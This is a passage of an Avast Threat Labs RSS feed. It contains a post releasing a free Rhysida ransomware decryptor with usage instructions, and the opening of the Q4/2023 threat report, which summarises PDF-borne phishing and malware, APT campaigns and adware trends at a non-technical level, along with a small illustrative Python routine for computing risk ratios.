  3003. <description><![CDATA[<p>The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including the IT (Information Technology) sector, healthcare, universities, and government organizations.</p>
  3004. <p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/">Decrypted: Rhysida Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  3005. ]]></description>
  3006. <content:encoded><![CDATA[
  3007. <p>In October 2023, we published a <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">blog post containing technical analysis</a> of the Rhysida ransomware. What we intentionally omitted in the blog post was that we had been aware of a cryptographic vulnerability in this ransomware for several months and, since August 2023, we had covertly provided victims with our decryption tool. Thanks to our collaboration with law enforcement units, we were able to quietly assist numerous organizations by decrypting their files for free, enabling them to regain functionality. Given that the <a href="https://thehackernews.com/2024/02/rhysida-ransomware-cracked-free.html">weakness in Rhysida ransomware was publicly disclosed</a> recently, we are now publicly releasing our decryptor for download to all victims of the Rhysida ransomware.</p>
  3008.  
  3009.  
  3010.  
  3011. <p>The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including the IT (Information Technology) sector, healthcare, universities, and government organizations.</p>
  3012.  
  3013.  
  3014.  
  3015. <h2 class="wp-block-heading">Usage of the Decryptor</h2>
  3016.  
  3017.  
  3018.  
  3019. <p>Please read the following instructions carefully; the rate of success depends on following them.</p>
  3020.  
  3021.  
  3022.  
  3023. <p><strong>Several parameters of the infected PC affect the encryption (and decryption) of the files:</strong></p>
  3024.  
  3025.  
  3026.  
  3027. <ul>
  3028. <li>Set of drive letters</li>
  3029.  
  3030.  
  3031.  
  3032. <li>Order of files</li>
  3033.  
  3034.  
  3035.  
  3036. <li>Number of CPU cores</li>
  3037.  
  3038.  
  3039.  
  3040. <li>Bitness of the executed ransomware sample</li>
  3041.  
  3042.  
  3043.  
  3044. <li>Format of files before encryption</li>
  3045. </ul>
  3046.  
  3047.  
  3048.  
  3049. <p><strong>For these reasons, the following rules must be obeyed while decrypting files:</strong></p>
  3050.  
  3051.  
  3052.  
  3053. <ul>
  3054. <li>The decryptor must be executed on the same machine where the files were encrypted</li>
  3055.  
  3056.  
  3057.  
  3058. <li>Password cracking process must be executed on the same machine where the files were encrypted</li>
  3059.  
  3060.  
  3061.  
  3062. <li>No files from another machine can be copied to the machine where the decryption process is performed</li>
  3063.  
  3064.  
  3065.  
  3066. <li>Text files (source files, INI files, XML, HTML, &#8230;) must have a certain minimum size to be decryptable</li>
  3067. </ul>
  3068.  
  3069.  
  3070.  
  3071. <p>64-bit samples of the Rhysida encryptor are far more common. For that reason, the default configuration of the decryptor assumes a 64-bit encryptor. If you are sure that it was the 32-bit version (for example, if you have a 32-bit operating system), the decryptor can be switched to 32-bit mode with the following command line parameter:</p>
  3072.  
  3073.  
  3074.  
  3075. <p><code>avast_decryptor_rhysida.exe /ptr:32</code></p>
  3076.  
  3077.  
  3078.  
  3079. <p>If you want to verify whether the decryption process will work without changing the files, you may use the “testing mode” of the decryptor. This mode is activated by the following command line parameter:</p>
  3080.  
  3081.  
  3082.  
  3083. <p><code>avast_decryptor_rhysida.exe /nodecrypt</code></p>
  3084.  
  3085.  
  3086.  
  3087. <p>The Rhysida decryptor also relies on knowing the format of the encrypted file. Common file formats, such as Office documents, archives, pictures, and multimedia files, are already covered. If your encrypted data includes valuable documents in less common or proprietary formats, please contact us at <a href="mailto:decryptors@avast.com">decryptors@avast.com</a>. We can analyze the file format and, if possible, add support for it to the decryptor.</p>
  3088.  
  3089.  
  3090.  
  3091. <h2 class="wp-block-heading">Steps to Use the Decryptor</h2>
  3092.  
  3093.  
  3094.  
  3095. <ol>
  3096. <li>Download the decryptor <a href="https://files.avast.com/files/decryptor/avast_decryptor_rhysida.exe">here</a>.</li>
  3097.  
  3098.  
  3099.  
  3100. <li>Run the decryptor. Unless you need one or more command line modifications, you can simply run it by clicking on the downloaded file.</li>
  3101.  
  3102.  
  3103.  
  3104. <li>On the initial page, you must confirm that you are running the decryptor on the same PC where the files were encrypted. Click Yes, then the Next button when you are ready to start.</li>
  3105. </ol>
  3106.  
  3107.  
  3108.  
  3109. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1.png" alt="" class="wp-image-8028" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture1-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3110.  
  3111.  
  3112.  
  3113. <ol start="4">
  3114. <li>The next page shows the list of drive letters on the PC. You may notice that it is in reverse order. Please keep it as it is and click “Next.”</li>
  3115. </ol>
  3116.  
  3117.  
  3118.  
  3119. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2.png" alt="" class="wp-image-8029" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture2-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3120.  
  3121.  
  3122.  
  3123. <ol start="5">
  3124. <li>The next screen requires you to enter an example of an encrypted file. In most cases, the decryptor picks the best file available for the password cracking process.</li>
  3125. </ol>
  3126.  
  3127.  
  3128.  
  3129. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3.png" alt="" class="wp-image-8030" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture3-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3130.  
  3131.  
  3132.  
  3133. <ol start="6">
  3134. <li>The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory.</li>
  3135. </ol>
  3136.  
  3137.  
  3138.  
  3139. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4.png" alt="" class="wp-image-8031" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture4-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3140.  
  3141.  
  3142.  
  3143. <ol start="7">
  3144. <li>Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next:</li>
  3145. </ol>
  3146.  
  3147.  
  3148.  
  3149. <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5.png" alt="" class="wp-image-8032" style="width:608px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture5-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3150.  
  3151.  
  3152.  
  3153. <ol start="8">
  3154. <li>On the final page, you can opt in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.</li>
  3155. </ol>
  3156.  
  3157.  
  3158.  
  3159. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="608" height="437" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6.png" alt="" class="wp-image-8033" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6.png 608w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Picture6-300x216.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
  3160.  
  3161.  
  3162.  
  3163. <p>For questions or comments about the Avast decryptor, email <a href="mailto:decryptors@avast.com">decryptors@avast.com</a>.</p>
  3164. <p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/">Decrypted: Rhysida Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  3165. ]]></content:encoded>
  3166. </item>
  3167. <item>
  3168. <title>Avast Q4/2023 Threat Report</title>
  3169. <link>https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=avast-q4-2023-threat-report</link>
  3170. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  3171. <pubDate>Wed, 07 Feb 2024 14:00:00 +0000</pubDate>
  3172. <category><![CDATA[Mobile]]></category>
  3173. <category><![CDATA[PC]]></category>
  3174. <category><![CDATA[Reports]]></category>
  3175. <category><![CDATA[desktop]]></category>
  3176. <category><![CDATA[malware]]></category>
  3177. <category><![CDATA[mobile]]></category>
  3178. <category><![CDATA[report]]></category>
  3179. <category><![CDATA[risk]]></category>
  3180. <category><![CDATA[threats]]></category>
  3181. <guid isPermaLink="false">https://decoded.avast.io/?p=7936</guid>
  3182.  
  3183. <description><![CDATA[<p>10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused</p>
  3184. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/">Avast Q4/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  3185. ]]></description>
  3186. <content:encoded><![CDATA[
  3187. <h2 class="wp-block-heading">10 Billion Attacks Blocked in 2023, Qakbot&#8217;s Resurrection, and Google API Abused</h2>
  3188.  
  3189.  
  3190.  
  3191. <h3 class="wp-block-heading">Foreword</h3>
  3192.  
  3193.  
  3194.  
  3195. <p>Welcome to the new edition of our report. As we bid farewell to the year 2023, let&#8217;s briefly revisit the threat landscape that defined the past year. In 2023, the overall number of unique blocked attacks surged, reaching an unprecedented milestone of more than 10 billion attacks and a remarkable 49% increase year-over-year. This staggering figure, once considered unimaginable, now reflects the harsh reality of our digital landscape. The intensity of these attacks peaked in the final quarter, with a 17% quarter-on-quarter increase, and a monthly average exceeding 1.2 billion attacks.</p>
  3196.  
  3197.  
  3198. <div class="wp-block-image">
  3199. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="667" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-667x1024.png" alt="" class="wp-image-7941" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-667x1024.png 667w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-196x300.png 196w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-768x1178.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-1001x1536.png 1001w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x-1335x2048.png 1335w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Threat-Labs-infographic_2x.png 1584w" sizes="(max-width: 667px) 100vw, 667px" /></figure></div>
  3200.  
  3201.  
  3202. <p>Q4/2023 was an exceptionally eventful period marked by a myriad of cyber threat developments. Our featured story navigates the intricate PDF threat landscape, unveiling the surge in digital document deception. Threat actors capitalized on PDF files, weaving a complex web of attacks ranging from dating scams and phishing attempts to sophisticated password stealers exemplified by AgentTesla.</p>
  3203.  
  3204.  
  3205.  
  3206. <p>In a notable turn of events, this quarter marked the (predicted by many) reappearance of Qakbot, previously dismantled by the FBI. Despite law enforcement efforts, Qakbot resurfaced in December, revealing intriguing overlaps in distribution with Pikabot. Additionally, the sextortion bot Twizt expanded its repertoire by incorporating brute forcing of VNC endpoints.</p>
  3207.  
  3208.  
  3209.  
  3210. <p>In a quarter filled with significant developments, a noteworthy trend emerged in the realm of info-stealers. While these threats experienced a slight uptick, what sets this period apart is the inventive abuse of the Google OAuth API for recovering authentication cookies by Lumma, Rhadamanthys, and other stealers. This novel approach significantly amplifies the impact of their malicious activities.</p>
  3211.  
  3212.  
  3213.  
  3215.  
  3216.  
  3217.  
  3218. <p>While there was an overall decline in coinminers, a staggering 250% quarter-on-quarter surge in malicious coinmining in the USA, propelled by the widespread dissemination of XMRig, stood out. Furthermore, adware on desktop maintained a heightened activity level, employing new tricks such as swift DNS record switches for ad servers.</p>
  3219.  
  3220.  
  3221.  
  3222. <p>We also observed a subtle uptick in ransomware attacks, featuring prominent groups like LockBit and ALPHV/BlackCat in the headlines. Meanwhile, law enforcement and cybersecurity entities counteracted, exemplified by the release of free decryption tools for Babuk-Tortilla and BlackCat.</p>
  3223.  
  3224.  
  3225.  
  3226. <p>Notably, a year after the takedown of the NetWire RAT, its eradication was affirmed. However, it was swiftly replaced not only by already prominent RATs but also by new ones such as zgRAT, Krasue, and SugarGh0st.</p>
  3227.  
  3228.  
  3229.  
  3230. <p class="has-text-align-left">Web threats continued to dominate, with scams, phishing, and malvertising ranking as the top threat types overall. The use of malicious browser push notifications escalated, becoming a preferred tool for scammers across various domains, from adult content sites to technical support scams, and financial frauds. Deepfake videos, especially those endorsing investment scams, displayed a heightened level of sophistication, challenging the ability to distinguish between real and fabricated content. Dating and romance scams, affecting approximately one in 20 of our users every month, showcased a global reach, expanding beyond western countries to target the Arab states and Asia. With Valentine&#8217;s Day approaching, an upward trend in these scams is anticipated. Furthermore, the conclusion of the year saw a surge in fake e-shops masquerading as renowned brands, leading unsuspecting victims into phishing traps.</p>
  3231.  
  3232.  
  3233.  
  3234. <p>Furthermore, the mobile threat landscape continued to evolve, witnessing the resurgence of the Chameleon banker and the insidious spread of SpyLoans on the PlayStore, posing serious threats, including physical violence blackmail.</p>
  3235.  
  3236.  
  3237.  
  3238. <p>Finally, as we venture into 2024, we anticipate a dynamic year ahead. Our team has ventured into the realm of predictions for 2024, foreseeing the evolving trends in cyber threats. While we hope our predictions do not come to fruition, and the digital space becomes safer than the close of 2023, your safety remains our top priority. Thank you for your trust in Avast. Enjoy the rest of the report.</p>
  3239.  
  3240.  
  3241.  
  3242. <p class="has-text-align-right"><em>Jakub Křoustek, Malware Research Director</em></p>
  3243.  
  3244.  
  3245.  
  3246. <h3 class="wp-block-heading">Methodology</h3>
  3247.  
  3248.  
  3249.  
  3250. <p>This report is structured into two main sections: Desktop-related threats, where we describe our intelligence around attacks targeting the Windows, Linux, and Mac operating systems, with a specific emphasis on web-related threats, and Mobile-related threats, where we describe the attacks focusing on Android and iOS operating systems.</p>
  3251.  
  3252.  
  3253.  
  3254. <p>We use the term “risk ratio” in this report to denote the severity of specific threats. It is calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.</p>
  3255.  
  3256.  
  3257.  
  3258. <p>A blocked attack is defined as a unique combination of the protected user and a blocked threat identifier within the specified time frame.</p>
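<p>As an added illustration (not Avast's own code or data), the following Python sketch applies the two definitions above to constructed sample data: a blocked attack is a unique (user, threat identifier) pair within the time frame, and the risk ratio is the monthly average of attacked users divided by active users per country, reported only where the country has more than 10,000 active users. The record fields, the per-month reading of the 10,000-user threshold, and the function names are assumptions.</p>

```python
"""Risk ratio and blocked-attack counting as defined in the report's Methodology.

Added illustration, not Avast's own code. All records below are constructed
sample data; the field layout and function names are assumptions.
"""
from collections import defaultdict
from statistics import mean

# Constructed sample detections: (month, country, user_id, threat_id).
# The same user blocked twice for the same threat in one month counts once.
SAMPLE_DETECTIONS = [
    ("2023-10", "CZ", "u1", "T1"),
    ("2023-10", "CZ", "u1", "T1"),   # duplicate of the previous record, counted once
    ("2023-10", "CZ", "u2", "T2"),
    ("2023-11", "CZ", "u1", "T3"),
    ("2023-10", "XX", "u9", "T1"),   # country below the active-user threshold
]

# Constructed active-user counts per (month, country).
SAMPLE_ACTIVE_USERS = {
    ("2023-10", "CZ"): 20000,
    ("2023-11", "CZ"): 25000,
    ("2023-10", "XX"): 500,
}

# Assumption: the "more than 10,000 active users" rule is applied per month.
MIN_ACTIVE_USERS = 10000


def count_blocked_attacks(detections):
    """Blocked attacks per (month, country): unique (user, threat) pairs."""
    seen = defaultdict(set)
    for month, country, user, threat in detections:
        seen[(month, country)].add((user, threat))
    return {key: len(pairs) for key, pairs in seen.items()}


def count_attacked_users(detections):
    """Attacked users per (month, country): unique users with at least one block."""
    seen = defaultdict(set)
    for month, country, user, _threat in detections:
        seen[(month, country)].add(user)
    return {key: len(users) for key, users in seen.items()}


def risk_ratio(detections, active_users, min_active=MIN_ACTIVE_USERS):
    """Monthly average of (attacked users / active users) per country.

    Months in which the country does not exceed min_active active users are
    skipped, so a country with no qualifying month is absent from the result.
    """
    attacked = count_attacked_users(detections)
    monthly = defaultdict(list)
    for (month, country), active in active_users.items():
        if active <= min_active:
            continue
        monthly[country].append(attacked.get((month, country), 0) / active)
    return {country: mean(ratios) for country, ratios in monthly.items()}


if __name__ == "__main__":
    print(count_blocked_attacks(SAMPLE_DETECTIONS))
    print(risk_ratio(SAMPLE_DETECTIONS, SAMPLE_ACTIVE_USERS))
```

<p>With the constructed data, the duplicate CZ record collapses into a single blocked attack, and XX is dropped from the risk ratio because its 500 active users fall under the threshold.</p>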
  3259.  
  3260.  
  3261.  
  3262. <h3 class="wp-block-heading">Featured Story: The PDF Threat Landscape</h3>
  3263.  
  3264.  
  3265.  
  3266. <p>In recent times, the cybersecurity landscape has seen a surge in sophisticated malware attacks, with cybercriminals exploiting various vectors to compromise systems and networks. One particularly concerning trend has been the expansion of malware threats through PDF files, a widely used format for document sharing and collaboration.</p>
  3267.  
  3268.  
  3269.  
  3270. <p>PDF files have long been a favored medium for sharing documents due to their platform-agnostic nature and consistent formatting across different devices and operating systems. However, this ubiquity has made them an attractive vector for cybercriminals seeking to deliver malware discreetly. Furthermore, PDF attachments are often allowed by default by spam gateways, adding another layer of vulnerability. What&#8217;s more, PDF files can be seamlessly opened on both PCs and mobile devices, which makes them an ideal vehicle for delivering malicious payloads (for example, by embedding a malicious Word file into a PDF file). Additionally, attackers have begun using bogus URLs, often disguising them through services like the sLinks link shortener, in an effort to bypass antivirus scanners and heighten their chances of successful deployment.</p>
  3271.  
  3272.  
  3273.  
  3274. <p>Social engineering is always present in cyberthreats, and we can analyze the typical behaviors used to fool users. One common example is a message that supposedly comes from a known company, such as Amazon or some financial entity, with a clearly defined message, such as:</p>
  3275.  
  3276.  
  3277.  
  3278. <ol>
  3279. <li>Your account has been blocked.</li>
  3280.  
  3281.  
  3282.  
  3283. <li>You are given the means to unblock it.</li>
  3284.  
  3285.  
  3286.  
  3287. <li>If you don’t do it in 24 hours, you’ll lose access to your account forever.</li>
  3288. </ol>
  3289.  
  3290.  
  3291.  
  3292. <p>The sense of urgency is key in most scams, encouraging victims to act fast and not think twice about the situation. Some other scams are more subtle. The below example poses as Netflix, describing problems with your payment. The simple message – utilizing Netflix branding – indicates an issue with your payment and asks you to update your details:</p>
  3293.  
  3294.  
  3295. <div class="wp-block-image">
  3296. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="774" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-774x1024.png" alt="" class="wp-image-7942" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-774x1024.png 774w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-227x300.png 227w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890-768x1015.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/023fabdd97b772dce6b266d38240d10e4d5d81b06d221fc246fb2b2a6706951d.pdf-e1707143782890.png 931w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">Phishing PDF – Netflix</figcaption></figure></div>
  3297.  
  3298.  
  3299. <p>Once you click the link, you are brought through the steps to enter your financial information, which is then taken by the malicious actors.</p>
  3300.  
  3301.  
  3302.  
  3303. <p>Another common scam is the good old lottery scam. In this scam, you’ve been awarded some lottery prize (without even participating, how lucky!) and you are asked to send some personal details to receive the money. Of course, if you contact the scammers, they will ask you for some money in advance to pay the transfer fees.</p>
  3304.  
  3305.  
  3306.  
  3307. <p>Many types of attacks are suitable in PDF format – we have even seen dating scams, because&#8230; why not? But PDF-based attacks can also include malware, where the final payload will infect your device, as shown in the following example:</p>
  3308.  
  3309.  
  3310. <div class="wp-block-image">
  3311. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="519" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1e512af2d4bc9aec5ead05d077c523a2eb88d29f58f96eab17f207c01e6dab54.pdf-1024x519.png" alt="" class="wp-image-7946"/><figcaption class="wp-element-caption">Malware PDF – final payload: AgentTesla</figcaption></figure></div>
  3312.  
  3313.  
  3314. <p>In recent malware campaigns, we have observed a spectrum of threats and scams, ranging from simple ones like lottery and dating scams, through phishing PDFs containing deceptive information and a link to a phishing page, to complex campaigns delivering more sophisticated threats in JavaScript or embedded objects, culminating in strains such as AgentTesla, DarkGate, GuLoader, IcedID, RemcosRat, Ursnif, Qakbot or various APT groups. We have blocked more than 10 million PDF-based attacks, protecting more than 4 million users worldwide:</p>
  3315.  
  3316.  
  3317.  
  3319.  
  3320.  
  3321. <div class="wp-block-image">
  3322. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="440" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1024x440.png" alt="" class="wp-image-8019" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1024x440.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-300x129.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-768x330.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats-1128x484.png 1128w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pdf_stats.png 1227w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">PDF threats blocked in the last 6 months</figcaption></figure></div>
  3323.  
  3324.  
  3325. <p>The proliferation of PDF-based cyber threats underscores a significant shift in the tactics of cybercriminals. These attacks, ranging from simple scams to complex malware deliveries, demonstrate the adaptability and cunning of attackers in exploiting trusted digital mediums. PDF files, due to their ubiquity and inherent trust, have become a prime vector for a variety of malicious activities. This trend not only reflects the innovative methods of cybercriminals but also highlights the vulnerabilities inherent in everyday digital interactions.</p>
  3326.  
  3327.  
  3328.  
  3329. <p>The examples provided reveal a common thread: the exploitation of human psychology. The sense of urgency, the promise of rewards, and the fear of loss are leveraged to manipulate victims. Moreover, the transition from simple deception to sophisticated malware payloads like AgentTesla, DarkGate, and others, indicates a disturbing escalation in the severity of these threats.</p>
  3330.  
  3331.  
  3332.  
  3333. <p>Our analysis shows that, despite the diversity of these attacks, they share a reliance on social engineering and the exploitation of trusted channels. As we have successfully blocked a sizeable number of these attacks, it&#8217;s clear that robust cybersecurity measures can be highly effective. However, the battle is not solely technological. Education and awareness play a crucial role. Users must be vigilant, question the authenticity of unsolicited communications, and be aware of the signs of phishing and scams.</p>
  3334.  
  3335.  
  3336.  
  3337. <p class="has-text-align-right"><em>Luis Corrons, Security Evangelist</em><br><em>Branislav Kramár,&nbsp;Malware Analyst</em></p>
  3338.  
  3339.  
  3340.  
  3341. <h2 class="wp-block-heading">Desktop-Related Threats</h2>
  3342.  
  3343.  
  3344.  
  3345. <h3 class="wp-block-heading">Advanced Persistent Threats (APTs)</h3>
  3346.  
  3347.  
  3348.  
  3349. <p><em>An Advanced Persistent Threat (APT) is a type of cyberattack that is conducted by highly skilled and determined hackers who have the resources and expertise to penetrate a target&#8217;s network and maintain a long-term presence undetected.</em></p>
  3350.  
  3351.  
  3352.  
  3353. <p>The final quarter of 2023 has been marked by a series of sophisticated cyberattacks, underlining the persistent and evolving threats posed by Advanced Persistent Threat (APT) groups worldwide. These threat actors have demonstrated their capability and intent to target governmental and military entities, employing a range of techniques from spear-phishing to complex malware.</p>
  3354.  
  3355.  
  3356.  
  3357. <h6 class="wp-block-heading">Spyware Campaign Against Government Entities in the Philippines</h6>
  3358.  
  3359.  
  3360.  
  3361. <p>In the Philippines, government entities became the focus of a spyware campaign in Q4 2023. This operation utilized an infection chain that incorporated various techniques including spyware, PowerShell and .NET stealers, and spear-phishing as an infection vector. The complexity of this campaign was notable, with each stage employing different methods to infiltrate, monitor, and extract sensitive information from targeted systems. This demonstrates a high level of sophistication and resource investment.</p>
  3362.  
  3363.  
  3364.  
  3365. <h6 class="wp-block-heading">MustangPanda&#8217;s Diverse Geographic Targets</h6>
  3366.  
  3367.  
  3368.  
3369. <p>MustangPanda, a well-known APT group, extended its operations across several countries, including Vietnam, Australia, the Philippines, Myanmar, and Taiwan. Their operations are marked by the use of the well-known Korplug malware, demonstrating their preference for proven and effective tools in their cyber arsenal. Additionally, this group has been observed utilizing malware written in the Nim programming language. A key technique in their arsenal is the frequent use of sideloading, a method in which malware is loaded by abusing legitimate software processes.</p>
  3370.  
  3371.  
  3372.  
  3373. <h6 class="wp-block-heading">Attacks on the Pakistani Military</h6>
  3374.  
  3375.  
  3376.  
3377. <p>Pakistan&#8217;s military was the target of multiple APT groups, including Donot and Bitter, signifying the critical importance of military institutions as high-value targets in cyberspace. The attackers employed a combination of spear-phishing as an infection vector, LNK files, and custom backdoors. These attacks underscore the need for heightened cybersecurity measures within military networks, given their attractiveness to a wide range of threat actors.</p>
  3378.  
  3379.  
  3380.  
  3381. <h6 class="wp-block-heading">Lebanese Government Entities Under Siege</h6>
  3382.  
  3383.  
  3384.  
3385. <p>The Lebanese government also faced cyber threats, with a threat actor employing a range of techniques similar to those seen in other attacks, including spear-phishing and LNK files. The infection chain in these attacks was complex, starting with LNK files and moving through various stages including VBScript, BAT files, and AutoIT scripts, eventually leading to the deployment of a custom backdoor. This layered approach to infiltration reflects a strategic methodology designed to evade detection at multiple points, illustrating the lengths to which attackers are willing to go to maintain persistence and control within a targeted network.</p>
  3386.  
  3387.  
  3388.  
  3389. <h6 class="wp-block-heading">Gamaredon&#8217;s Aggressive Cyber Campaign in Ukraine</h6>
  3390.  
  3391.  
  3392.  
3393. <p>Ukraine has been the target of the Gamaredon group&#8217;s prolonged and aggressive cyber campaign, marked by a range of intrusive techniques. Their approach includes spear-phishing to gain initial access, followed by the deployment of obfuscated VBScripts and PowerShell scripts, complicating detection efforts. They also use document stealers to illicitly gather sensitive data. Uniquely, the group employs Telegram for disseminating Command and Control (CnC) IPs, a tactic aimed at evading traditional communication surveillance. Further, they spread malware through infected documents and LNK files. In their operations, they also utilize DNS services to acquire IP addresses directly, a technique intended to reduce detection by avoiding the use of domain names. This campaign has resulted in numerous victims, demonstrating Gamaredon&#8217;s persistent threat to Ukrainian cybersecurity.</p>
  3394.  
  3395.  
  3396.  
  3397. <h6 class="wp-block-heading">Lazarus</h6>
  3398.  
  3399.  
  3400.  
  3401. <p>In this quarter, we were monitoring increased activity from the Lazarus group. From our telemetry, it was evident that they continued to utilize ISO files combined with LNK files as an initialization loader for delivering payloads into systems.</p>
  3402.  
  3403.  
  3404.  
  3405. <p>In early October, Microsoft observed Lazarus exploiting CVE-2023-42793, a remote-code execution vulnerability impacting various versions of JetBrains, to deploy payloads. Following a successful compromise, they utilized PowerShell to download two payloads from legitimate infrastructure.</p>
  3406.  
  3407.  
  3408.  
3409. <p>We also identified the same toolset being used against our customers, predominantly those located in Europe.</p>
  3410.  
  3411.  
  3412.  
  3413. <p>In December, Cisco Talos reported on a new campaign by Lazarus. In this instance, they were employing a new Dlang-based malware, featuring two Remote Access Trojans (RATs). One of these RATs utilized Telegram bots and channels as a means of communication with the Command-and-Control servers.</p>
  3414.  
  3415.  
  3416.  
  3417. <p>This campaign targeted enterprises globally, focusing on those publicly hosting and exposing vulnerable infrastructure to n-day vulnerabilities such as CVE-2021-44228 (Log4j). The sectors primarily under attack included manufacturing, agriculture, and physical security companies.</p>
  3418.  
  3419.  
  3420.  
  3421. <p class="has-text-align-right"><em>Luigino Camastra, Malware Researcher</em><br><em>Igor Morgenstern, Malware Researcher</em></p>
  3422.  
  3423.  
  3424.  
  3425. <h3 class="wp-block-heading">Adware</h3>
  3426.  
  3427.  
  3428.  
  3429. <p><em>Adware is considered unwanted if installed without the user&#8217;s consent, tracks browsing behavior, redirects web traffic, or collects personal information for malicious purposes such as identity theft.</em></p>
  3430.  
  3431.  
  3432.  
  3433. <p>The rise in popularity of adware can be attributed to its potential for monetization and the dissemination of potentially unwanted programs (PUP) and malware. Moreover, advertisements promoting legal software also employ deceptive adware practices, which verge on the boundaries of scam-like activities. We classify these techniques as annoying and protect our users against this approach. While spreading malware through adware is not the predominant method for infecting victims&#8217; machines overall, our attention in Q4/2023 has been directed toward detecting adware to monitor this potential threat closely.</p>
  3434.  
  3435.  
  3436.  
